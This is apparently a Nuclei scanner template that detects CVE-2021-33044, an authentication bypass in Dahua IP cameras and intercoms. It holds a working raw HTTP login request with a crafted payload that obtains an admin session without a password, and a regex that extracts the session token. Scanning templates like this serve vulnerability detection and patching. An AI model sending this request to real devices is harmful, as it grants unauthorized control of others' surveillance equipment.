id: CVE-2021-33044 info: name: Dahua IPC/VTH/VTO - Authentication Bypass author: gy741 severity: critical description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. remediation: | Apply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability. reference: - https://github.com/dorkerdevil/CVE-2021-33044 - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 - https://seclists.org/fulldisclosure/2021/Oct/13 - https://www.dahuasecurity.com/support/cybersecurity/details/957 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-33044 cwe-id: CWE-287 epss-score: 0.30474 epss-percentile: 0.96444 cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dahuasecurity product: ipc-hum7xxx_firmware tags: dahua,cve,cve2021,auth-bypass,seclists http: - raw: - | POST /RPC2_Login HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 Connection: close X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: {{BaseURL}} Referer: {{BaseURL}} {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0} matchers-condition: and matchers: - type: word part: body words: - '"result":true' - 'id' - 'params' - 'session' condition: and - type: status status: - 200 extractors: - type: regex group: 1 regex: - ',"result":true,"session":"([a-z]+)"\}' part: body # digest: 4a0a004730450221009e7f8d508d64fc28339df9bd760de23267fe81a44129e7c39b85f5922fa2a51202204ca684c402e7ad173dea66adec27429614e976f44cf705fe0e6c0065e4049d8a:922c64590222798bb761d5b6d8e72950